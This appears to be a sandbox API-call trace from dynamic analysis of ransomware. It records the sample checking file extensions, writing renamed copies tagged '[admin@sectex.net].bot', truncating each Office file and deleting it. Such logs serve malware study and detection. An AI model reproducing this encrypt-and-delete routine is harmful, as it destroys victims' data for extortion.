	[0147.041] lstrcmpiW (lpString1=".VRD", lpString2=".bot") returned 1
	[0147.041] lstrlenW (lpString="INSTLIST.VRD") returned 12
	[0147.042] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INSTLIST.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\instlist.vrd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0147.072] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=1899) returned 1
	[0147.072] CloseHandle (hObject=0x3b0) returned 1
	[0147.072] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INSTLIST.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\instlist.vrd")) returned 0x20
	[0147.083] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INSTLIST.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\instlist.vrd.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.083] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INSTLIST.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\instlist.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0147.083] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.083] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.084] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INSTLIST.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\instlist.vrd.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0147.084] GetLastError () returned 0x0
	[0147.085] ReadFile (in: hFile=0x3b0, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x76b, lpOverlapped=0x0) returned 1
	[0147.122] WriteFile (in: hFile=0x3c4, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x770, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x770, lpOverlapped=0x0) returned 1
	[0147.123] ReadFile (in: hFile=0x3b0, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.123] WriteFile (in: hFile=0x3c4, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.123] SetEndOfFile (hFile=0x3c4) returned 1
	[0147.123] CloseHandle (hObject=0x3c4) returned 1
	[0147.123] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.123] SetEndOfFile (hFile=0x3b0) returned 1
	[0147.125] CloseHandle (hObject=0x3b0) returned 1
	[0147.125] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INSTLIST.VRD.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.126] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INSTLIST.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\instlist.vrd")) returned 1
	[0147.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INSTLIST.VRD") returned 60
	[0147.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INSTLIST.VRD") returned 60
	[0147.126] lstrlenW (lpString=".doc") returned 4
	[0147.126] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0147.126] lstrlenW (lpString=".docx") returned 5
	[0147.126] lstrcmpiW (lpString1=".docx", lpString2="T.VRD") returned -1
	[0147.126] lstrlenW (lpString=".pdf") returned 4
	[0147.126] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0147.126] lstrlenW (lpString=".xls") returned 4
	[0147.126] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0147.126] lstrlenW (lpString=".xlsx") returned 5
	[0147.126] lstrcmpiW (lpString1=".xlsx", lpString2="T.VRD") returned -1
	[0147.127] lstrlenW (lpString=".ppt") returned 4
	[0147.127] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0147.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INSTLIST.VRD") returned 60
	[0147.127] lstrlenW (lpString=".zip") returned 4
	[0147.127] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0147.127] lstrlenW (lpString=".rar") returned 4
	[0147.127] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0147.127] lstrlenW (lpString=".bz2") returned 4
	[0147.127] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0147.127] lstrlenW (lpString=".7z") returned 3
	[0147.127] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0147.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INSTLIST.VRD") returned 60
	[0147.127] lstrlenW (lpString=".dbf") returned 4
	[0147.127] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0147.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INSTLIST.VRD") returned 60
	[0147.127] lstrlenW (lpString=".1cd") returned 4
	[0147.127] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
	[0147.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INSTLIST.VRD") returned 60
	[0147.127] lstrlenW (lpString=".jpg") returned 4
	[0147.127] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0147.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INSTLIST.VRD") returned 60
	[0147.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INSTLIST.VRD") returned 60
	[0147.127] lstrlenW (lpString=".doc") returned 4
	[0147.127] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0147.127] lstrlenW (lpString=".docx") returned 5
	[0147.127] lstrcmpiW (lpString1=".docx", lpString2="T.VRD") returned -1
	[0147.127] lstrlenW (lpString=".pdf") returned 4
	[0147.127] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0147.127] lstrlenW (lpString=".xls") returned 4
	[0147.127] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0147.127] lstrlenW (lpString=".xlsx") returned 5
	[0147.127] lstrcmpiW (lpString1=".xlsx", lpString2="T.VRD") returned -1
	[0147.128] lstrlenW (lpString=".ppt") returned 4
	[0147.128] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0147.128] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INSTLIST.VRD") returned 60
	[0147.128] lstrlenW (lpString=".zip") returned 4
	[0147.128] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0147.128] lstrlenW (lpString=".rar") returned 4
	[0147.128] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0147.128] lstrlenW (lpString=".bz2") returned 4
	[0147.128] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0147.128] lstrlenW (lpString=".7z") returned 3
	[0147.128] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0147.128] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INSTLIST.VRD") returned 60
	[0147.128] lstrlenW (lpString=".dbf") returned 4
	[0147.128] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0147.128] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INSTLIST.VRD") returned 60
	[0147.128] lstrlenW (lpString=".1cd") returned 4
	[0147.128] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
	[0147.128] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INSTLIST.VRD") returned 60
	[0147.128] lstrlenW (lpString=".jpg") returned 4
	[0147.128] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0147.128] lstrcmpiW (lpString1=".VSL", lpString2=".bot") returned 1
	[0147.128] lstrlenW (lpString="LGND.VSL") returned 8
	[0147.128] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\LGND.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\lgnd.vsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0147.624] GetFileSizeEx (in: hFile=0x398, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=39296) returned 1
	[0147.624] CloseHandle (hObject=0x398) returned 1
	[0147.624] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\LGND.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\lgnd.vsl")) returned 0x20
	[0147.643] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\LGND.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\lgnd.vsl.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.643] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\LGND.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\lgnd.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8
	[0147.643] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.643] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.643] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\LGND.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\lgnd.vsl.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0147.644] GetLastError () returned 0x0
	[0147.644] ReadFile (in: hFile=0x1b8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x9980, lpOverlapped=0x0) returned 1
	[0147.748] WriteFile (in: hFile=0x3d0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x9990, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x9990, lpOverlapped=0x0) returned 1
	[0147.749] ReadFile (in: hFile=0x1b8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.749] WriteFile (in: hFile=0x3d0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xe4, lpOverlapped=0x0) returned 1
	[0147.749] SetEndOfFile (hFile=0x3d0) returned 1
	[0147.749] CloseHandle (hObject=0x3d0) returned 1
	[0147.749] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.749] SetEndOfFile (hFile=0x1b8) returned 1
	[0147.754] CloseHandle (hObject=0x1b8) returned 1
	[0147.754] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\LGND.VSL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.755] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\LGND.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\lgnd.vsl")) returned 1
	[0147.755] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\LGND.VSL") returned 56
	[0147.755] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\LGND.VSL") returned 56
	[0147.755] lstrlenW (lpString=".doc") returned 4
	[0147.755] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0147.756] lstrlenW (lpString=".docx") returned 5
	[0147.756] lstrcmpiW (lpString1=".docx", lpString2="D.VSL") returned -1
	[0147.756] lstrlenW (lpString=".pdf") returned 4
	[0147.756] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0147.756] lstrlenW (lpString=".xls") returned 4
	[0147.756] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0147.756] lstrlenW (lpString=".xlsx") returned 5
	[0147.756] lstrcmpiW (lpString1=".xlsx", lpString2="D.VSL") returned -1
	[0147.756] lstrlenW (lpString=".ppt") returned 4
	[0147.756] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0147.756] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\LGND.VSL") returned 56
	[0147.756] lstrlenW (lpString=".zip") returned 4
	[0147.756] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0147.756] lstrlenW (lpString=".rar") returned 4
	[0147.756] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0147.756] lstrlenW (lpString=".bz2") returned 4
	[0147.756] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0147.756] lstrlenW (lpString=".7z") returned 3
	[0147.756] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0147.756] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\LGND.VSL") returned 56
	[0147.756] lstrlenW (lpString=".dbf") returned 4
	[0147.756] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0147.756] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\LGND.VSL") returned 56
	[0147.756] lstrlenW (lpString=".1cd") returned 4
	[0147.756] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0147.756] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\LGND.VSL") returned 56
	[0147.756] lstrlenW (lpString=".jpg") returned 4
	[0147.756] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0147.756] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\LGND.VSL") returned 56
	[0147.756] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\LGND.VSL") returned 56
	[0147.756] lstrlenW (lpString=".doc") returned 4
	[0147.756] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0147.757] lstrlenW (lpString=".docx") returned 5
	[0147.757] lstrcmpiW (lpString1=".docx", lpString2="D.VSL") returned -1
	[0147.757] lstrlenW (lpString=".pdf") returned 4
	[0147.757] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0147.757] lstrlenW (lpString=".xls") returned 4
	[0147.757] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0147.757] lstrlenW (lpString=".xlsx") returned 5
	[0147.757] lstrcmpiW (lpString1=".xlsx", lpString2="D.VSL") returned -1
	[0147.757] lstrlenW (lpString=".ppt") returned 4
	[0147.757] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0147.757] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\LGND.VSL") returned 56
	[0147.757] lstrlenW (lpString=".zip") returned 4
	[0147.757] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0147.757] lstrlenW (lpString=".rar") returned 4
	[0147.757] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0147.757] lstrlenW (lpString=".bz2") returned 4
	[0147.757] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0147.757] lstrlenW (lpString=".7z") returned 3
	[0147.757] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0147.757] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\LGND.VSL") returned 56
	[0147.757] lstrlenW (lpString=".dbf") returned 4
	[0147.757] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0147.757] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\LGND.VSL") returned 56
	[0147.757] lstrlenW (lpString=".1cd") returned 4
	[0147.757] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0147.757] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\LGND.VSL") returned 56
	[0147.757] lstrlenW (lpString=".jpg") returned 4
	[0147.757] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0147.758] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0147.758] lstrlenW (lpString="MSAIN.DLL") returned 9
	[0147.758] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSAIN.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msain.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8
	[0147.760] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=1212288) returned 1
	[0147.760] CloseHandle (hObject=0x1b8) returned 1
	[0147.760] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSAIN.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msain.dll")) returned 0x20
	[0147.760] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSAIN.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msain.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.760] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSAIN.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msain.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0147.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSAIN.DLL") returned 57
	[0147.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSAIN.DLL") returned 57
	[0147.761] lstrlenW (lpString=".doc") returned 4
	[0147.761] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0147.761] lstrlenW (lpString=".docx") returned 5
	[0147.761] lstrcmpiW (lpString1=".docx", lpString2="N.DLL") returned -1
	[0147.761] lstrlenW (lpString=".pdf") returned 4
	[0147.761] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0147.761] lstrlenW (lpString=".xls") returned 4
	[0147.761] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0147.761] lstrlenW (lpString=".xlsx") returned 5
	[0147.761] lstrcmpiW (lpString1=".xlsx", lpString2="N.DLL") returned -1
	[0147.761] lstrlenW (lpString=".ppt") returned 4
	[0147.761] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0147.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSAIN.DLL") returned 57
	[0147.761] lstrlenW (lpString=".zip") returned 4
	[0147.761] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0147.761] lstrlenW (lpString=".rar") returned 4
	[0147.761] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0147.761] lstrlenW (lpString=".bz2") returned 4
	[0147.761] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0147.761] lstrlenW (lpString=".7z") returned 3
	[0147.761] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0147.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSAIN.DLL") returned 57
	[0147.761] lstrlenW (lpString=".dbf") returned 4
	[0147.761] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0147.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSAIN.DLL") returned 57
	[0147.761] lstrlenW (lpString=".1cd") returned 4
	[0147.761] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0147.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSAIN.DLL") returned 57
	[0147.762] lstrlenW (lpString=".jpg") returned 4
	[0147.762] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0147.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSAIN.DLL") returned 57
	[0147.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSAIN.DLL") returned 57
	[0147.762] lstrlenW (lpString=".doc") returned 4
	[0147.762] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0147.762] lstrlenW (lpString=".docx") returned 5
	[0147.762] lstrcmpiW (lpString1=".docx", lpString2="N.DLL") returned -1
	[0147.762] lstrlenW (lpString=".pdf") returned 4
	[0147.762] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0147.762] lstrlenW (lpString=".xls") returned 4
	[0147.762] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0147.762] lstrlenW (lpString=".xlsx") returned 5
	[0147.762] lstrcmpiW (lpString1=".xlsx", lpString2="N.DLL") returned -1
	[0147.762] lstrlenW (lpString=".ppt") returned 4
	[0147.762] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0147.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSAIN.DLL") returned 57
	[0147.762] lstrlenW (lpString=".zip") returned 4
	[0147.762] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0147.762] lstrlenW (lpString=".rar") returned 4
	[0147.762] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0147.762] lstrlenW (lpString=".bz2") returned 4
	[0147.762] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0147.762] lstrlenW (lpString=".7z") returned 3
	[0147.762] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0147.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSAIN.DLL") returned 57
	[0147.762] lstrlenW (lpString=".dbf") returned 4
	[0147.762] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0147.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSAIN.DLL") returned 57
	[0147.762] lstrlenW (lpString=".1cd") returned 4
	[0147.762] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0147.763] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSAIN.DLL") returned 57
	[0147.763] lstrlenW (lpString=".jpg") returned 4
	[0147.763] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0147.763] lstrcmpiW (lpString1=".ACL", lpString2=".bot") returned -1
	[0147.763] lstrlenW (lpString="MSO.ACL") returned 7
	[0147.763] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSO.ACL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mso.acl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8
	[0147.763] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=37762) returned 1
	[0147.763] CloseHandle (hObject=0x1b8) returned 1
	[0147.763] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSO.ACL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mso.acl")) returned 0x20
	[0147.763] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSO.ACL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mso.acl.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.764] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSO.ACL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mso.acl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8
	[0147.764] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.764] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.764] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSO.ACL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mso.acl.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0147.764] GetLastError () returned 0x0
	[0147.764] ReadFile (in: hFile=0x1b8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x9382, lpOverlapped=0x0) returned 1
	[0147.819] WriteFile (in: hFile=0x3d0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x9390, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x9390, lpOverlapped=0x0) returned 1
	[0147.820] ReadFile (in: hFile=0x1b8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.820] WriteFile (in: hFile=0x3d0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xe2, lpOverlapped=0x0) returned 1
	[0147.821] SetEndOfFile (hFile=0x3d0) returned 1
	[0147.821] CloseHandle (hObject=0x3d0) returned 1
	[0147.821] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.821] SetEndOfFile (hFile=0x1b8) returned 1
	[0147.826] CloseHandle (hObject=0x1b8) returned 1
